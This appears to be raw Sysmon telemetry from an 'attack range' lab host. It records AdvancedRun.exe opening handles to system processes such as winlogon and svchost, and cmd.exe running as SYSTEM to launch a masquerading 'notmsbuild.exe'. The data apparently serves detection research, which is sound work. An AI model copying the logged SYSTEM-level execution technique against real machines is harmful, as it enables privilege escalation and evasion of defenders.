20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.906{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004063634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.905{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004063633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.904{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
istratorATTACKRANGE\Administrator 154100x80000000000000004063553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.839{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004057141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.257{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004057134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.248{834264DD-0FD9-61EB-D607-000000002702}5868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg 
/runATTACKRANGE\Administrator 10341000x80000000000000004057133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.246{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.244{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
